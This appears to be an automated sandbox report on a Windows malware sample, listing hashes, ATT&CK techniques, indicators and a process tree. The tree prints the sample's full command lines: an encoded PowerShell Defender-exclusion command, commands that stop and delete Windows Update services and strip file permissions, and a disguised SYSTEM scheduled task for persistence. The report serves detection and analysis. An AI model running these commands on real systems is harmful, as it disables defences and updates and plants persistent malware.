465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0

General

Target

465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0.exe
Size

2.0MB
MD5

79dbc1a54d33366681f1e926d565cad4
SHA1

907cf0ec6784bf140f9759d6931d3697da0fc229
SHA256

465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0
SHA512

6d66ae7edc6028e8bc1eac9caf85f5d2d38a6c000e5fa907c9eec5786b225aeeb7c0b565bee9aa7b09f6f792d0857e3d06f0e3ed832d73047506a18ce15371dd

Score

10^/10

discovery evasion exploit

Malware Config

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe

Executes dropped EXE 1 IoCs

Processes:

services.exe

pid process

4936 services.exe
Possible privilege escalation attempt 4 IoCs
exploit

Processes:

icacls.exeicacls.exetakeown.exetakeown.exe

pid process

3700 icacls.exe
3864 icacls.exe
4832 takeown.exe
1384 takeown.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Modifies file permissions 1 TTPs 4 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exeicacls.exetakeown.exe

pid process

1384 takeown.exe
3700 icacls.exe
3864 icacls.exe
4832 takeown.exe

pid	process
4936	services.exe

pid	process
3700	icacls.exe
3864	icacls.exe
4832	takeown.exe
1384	takeown.exe

pid	process
1384	takeown.exe
3700	icacls.exe
3864	icacls.exe
4832	takeown.exe

Drops file in System32 directory 3 IoCs

Processes:

powershell.execonhost.exe

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log	conhost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

conhost.exe

description pid process target process

PID 4568 set thread context of 4924 4568 conhost.exe conhost.exe

description	pid	process	target process
PID 4568 set thread context of 4924	4568	conhost.exe	conhost.exe

Drops file in Program Files directory 2 IoCs

Processes:

conhost.exe

description	ioc	process
File created	C:\Program Files\Windows\services.exe	conhost.exe
File opened for modification	C:\Program Files\Windows\services.exe	conhost.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

4720 schtasks.exe

pid	process
4720	schtasks.exe

Modifies data under HKEY_USERS 52 IoCs

Processes:

powershell.execonhost.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe

Modifies registry key 1 TTPs 18 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid	process
1876	reg.exe
5104	reg.exe
2600	reg.exe
4984	reg.exe
2884	reg.exe
5092	reg.exe
2144	reg.exe
1892	reg.exe
2860	reg.exe
3500	reg.exe
2488	reg.exe
4688	reg.exe
4084	reg.exe
4844	reg.exe
4976	reg.exe
4880	reg.exe
3344	reg.exe
1920	reg.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.execonhost.exepowershell.execonhost.exe

pid process

4452 powershell.exe
4452 powershell.exe
4452 powershell.exe
3952 conhost.exe
516 powershell.exe
516 powershell.exe
516 powershell.exe
4568 conhost.exe

pid	process
4452	powershell.exe
4452	powershell.exe
4452	powershell.exe
3952	conhost.exe
516	powershell.exe
516	powershell.exe
516	powershell.exe
4568	conhost.exe

Suspicious use of AdjustPrivilegeToken 39 IoCs

Processes:

powershell.execonhost.exeschtasks.exepowershell.execonhost.exetakeown.exe

description	pid	process
Token: SeDebugPrivilege	4452	powershell.exe
Token: SeIncreaseQuotaPrivilege	4452	powershell.exe
Token: SeSecurityPrivilege	4452	powershell.exe
Token: SeTakeOwnershipPrivilege	4452	powershell.exe
Token: SeLoadDriverPrivilege	4452	powershell.exe
Token: SeSystemProfilePrivilege	4452	powershell.exe
Token: SeSystemtimePrivilege	4452	powershell.exe
Token: SeProfSingleProcessPrivilege	4452	powershell.exe
Token: SeIncBasePriorityPrivilege	4452	powershell.exe
Token: SeCreatePagefilePrivilege	4452	powershell.exe
Token: SeBackupPrivilege	4452	powershell.exe
Token: SeRestorePrivilege	4452	powershell.exe
Token: SeShutdownPrivilege	4452	powershell.exe
Token: SeDebugPrivilege	4452	powershell.exe
Token: SeSystemEnvironmentPrivilege	4452	powershell.exe
Token: SeRemoteShutdownPrivilege	4452	powershell.exe
Token: SeUndockPrivilege	4452	powershell.exe
Token: SeManageVolumePrivilege	4452	powershell.exe
Token: 33	4452	powershell.exe
Token: 34	4452	powershell.exe
Token: 35	4452	powershell.exe
Token: 36	4452	powershell.exe
Token: SeDebugPrivilege	3952	conhost.exe
Token: SeTakeOwnershipPrivilege	1384	schtasks.exe
Token: SeDebugPrivilege	516	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	516	powershell.exe
Token: SeIncreaseQuotaPrivilege	516	powershell.exe
Token: SeSecurityPrivilege	516	powershell.exe
Token: SeTakeOwnershipPrivilege	516	powershell.exe
Token: SeLoadDriverPrivilege	516	powershell.exe
Token: SeSystemtimePrivilege	516	powershell.exe
Token: SeBackupPrivilege	516	powershell.exe
Token: SeRestorePrivilege	516	powershell.exe
Token: SeShutdownPrivilege	516	powershell.exe
Token: SeSystemEnvironmentPrivilege	516	powershell.exe
Token: SeUndockPrivilege	516	powershell.exe
Token: SeManageVolumePrivilege	516	powershell.exe
Token: SeDebugPrivilege	4568	conhost.exe
Token: SeTakeOwnershipPrivilege	4832	takeown.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0.execonhost.execmd.execmd.execmd.execmd.exeservices.exe

description	pid	process	target process
PID 3220 wrote to memory of 3952	3220	465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0.exe	conhost.exe
PID 3220 wrote to memory of 3952	3220	465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0.exe	conhost.exe
PID 3220 wrote to memory of 3952	3220	465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0.exe	conhost.exe
PID 3952 wrote to memory of 4464	3952	conhost.exe	cmd.exe
PID 3952 wrote to memory of 4464	3952	conhost.exe	cmd.exe
PID 4464 wrote to memory of 4452	4464	cmd.exe	powershell.exe
PID 4464 wrote to memory of 4452	4464	cmd.exe	powershell.exe
PID 3952 wrote to memory of 2992	3952	conhost.exe	cmd.exe
PID 3952 wrote to memory of 2992	3952	conhost.exe	cmd.exe
PID 2992 wrote to memory of 4120	2992	cmd.exe	sc.exe
PID 2992 wrote to memory of 4120	2992	cmd.exe	sc.exe
PID 2992 wrote to memory of 5112	2992	cmd.exe	sc.exe
PID 2992 wrote to memory of 5112	2992	cmd.exe	sc.exe
PID 2992 wrote to memory of 4828	2992	cmd.exe	sc.exe
PID 2992 wrote to memory of 4828	2992	cmd.exe	sc.exe
PID 2992 wrote to memory of 3080	2992	cmd.exe	sc.exe
PID 2992 wrote to memory of 3080	2992	cmd.exe	sc.exe
PID 2992 wrote to memory of 1972	2992	cmd.exe	sc.exe
PID 2992 wrote to memory of 1972	2992	cmd.exe	sc.exe
PID 2992 wrote to memory of 4984	2992	cmd.exe	reg.exe
PID 2992 wrote to memory of 4984	2992	cmd.exe	reg.exe
PID 2992 wrote to memory of 1876	2992	cmd.exe	reg.exe
PID 2992 wrote to memory of 1876	2992	cmd.exe	reg.exe
PID 2992 wrote to memory of 2884	2992	cmd.exe	reg.exe
PID 2992 wrote to memory of 2884	2992	cmd.exe	reg.exe
PID 2992 wrote to memory of 4084	2992	cmd.exe	reg.exe
PID 2992 wrote to memory of 4084	2992	cmd.exe	reg.exe
PID 2992 wrote to memory of 4844	2992	cmd.exe	reg.exe
PID 2992 wrote to memory of 4844	2992	cmd.exe	reg.exe
PID 3952 wrote to memory of 3536	3952	conhost.exe	cmd.exe
PID 3952 wrote to memory of 3536	3952	conhost.exe	cmd.exe
PID 2992 wrote to memory of 1384	2992	cmd.exe	schtasks.exe
PID 2992 wrote to memory of 1384	2992	cmd.exe	schtasks.exe
PID 3536 wrote to memory of 4720	3536	cmd.exe	schtasks.exe
PID 3536 wrote to memory of 4720	3536	cmd.exe	schtasks.exe
PID 2992 wrote to memory of 3700	2992	cmd.exe	icacls.exe
PID 2992 wrote to memory of 3700	2992	cmd.exe	icacls.exe
PID 3952 wrote to memory of 3736	3952	conhost.exe	cmd.exe
PID 3952 wrote to memory of 3736	3952	conhost.exe	cmd.exe
PID 3736 wrote to memory of 4440	3736	cmd.exe	schtasks.exe
PID 3736 wrote to memory of 4440	3736	cmd.exe	schtasks.exe
PID 2992 wrote to memory of 3344	2992	cmd.exe	reg.exe
PID 2992 wrote to memory of 3344	2992	cmd.exe	reg.exe
PID 2992 wrote to memory of 4880	2992	cmd.exe	reg.exe
PID 2992 wrote to memory of 4880	2992	cmd.exe	reg.exe
PID 2992 wrote to memory of 4976	2992	cmd.exe	reg.exe
PID 2992 wrote to memory of 4976	2992	cmd.exe	reg.exe
PID 2992 wrote to memory of 5092	2992	cmd.exe	reg.exe
PID 2992 wrote to memory of 5092	2992	cmd.exe	reg.exe
PID 2992 wrote to memory of 4540	2992	cmd.exe	schtasks.exe
PID 2992 wrote to memory of 4540	2992	cmd.exe	schtasks.exe
PID 2992 wrote to memory of 3320	2992	cmd.exe	schtasks.exe
PID 2992 wrote to memory of 3320	2992	cmd.exe	schtasks.exe
PID 2992 wrote to memory of 4328	2992	cmd.exe	schtasks.exe
PID 2992 wrote to memory of 4328	2992	cmd.exe	schtasks.exe
PID 2992 wrote to memory of 4068	2992	cmd.exe	schtasks.exe
PID 2992 wrote to memory of 4068	2992	cmd.exe	schtasks.exe
PID 2992 wrote to memory of 1780	2992	cmd.exe	schtasks.exe
PID 2992 wrote to memory of 1780	2992	cmd.exe	schtasks.exe
PID 2992 wrote to memory of 3248	2992	cmd.exe	schtasks.exe
PID 2992 wrote to memory of 3248	2992	cmd.exe	schtasks.exe
PID 2992 wrote to memory of 4380	2992	cmd.exe	schtasks.exe
PID 2992 wrote to memory of 4380	2992	cmd.exe	schtasks.exe
PID 4936 wrote to memory of 4568	4936	services.exe	conhost.exe

C:\Users\Admin\AppData\Local\Temp\465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0.exe
"C:\Users\Admin\AppData\Local\Temp\465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3220

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0.exe"
2⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3952

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGgAdAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGMAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBsAHEAdgBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAaABmACMAPgA="
3⤵
- Suspicious use of WriteProcessMemory
PID:4464

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
- Suspicious use of WriteProcessMemory
PID:2992

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
4⤵
- Modifies registry key
PID:4984

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1384

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
4⤵
- Modifies registry key
PID:4844

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
4⤵
- Modifies registry key
PID:4084

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
4⤵
- Modifies security service
- Modifies registry key
PID:2884

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
4⤵
- Modifies registry key
PID:1876

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3700

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
PID:4380

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
4⤵
PID:3248

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
4⤵
PID:1780

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
4⤵
PID:4068

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
4⤵
PID:4328

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
4⤵
PID:3320

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
4⤵
PID:4540

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:5092

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:4976

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:4880

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:3344

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:3536

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"
4⤵
- Creates scheduled task(s)
PID:4720

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
3⤵
- Suspicious use of WriteProcessMemory
PID:3736

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAGgAdAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGMAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBsAHEAdgBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAaABmACMAPgA="
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4452

C:\Windows\system32\sc.exe
sc stop dosvc
1⤵
PID:1972

C:\Windows\system32\sc.exe
sc stop bits
1⤵
PID:3080

C:\Windows\system32\sc.exe
sc stop wuauserv
1⤵
PID:4828

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
1⤵
PID:5112

C:\Windows\system32\sc.exe
sc stop UsoSvc
1⤵
PID:4120

C:\Windows\system32\schtasks.exe
schtasks /run /tn "GoogleUpdateTaskMachineQC"
1⤵
PID:4440

C:\Program Files\Windows\services.exe
"C:\Program Files\Windows\services.exe"
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4936

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Program Files\Windows\services.exe"
2⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4568

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGgAdAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGMAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBsAHEAdgBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAaABmACMAPgA="
3⤵
PID:880

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
3⤵
PID:4924

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "dycqfudelnyzo"
4⤵
PID:4012

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
PID:5040

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
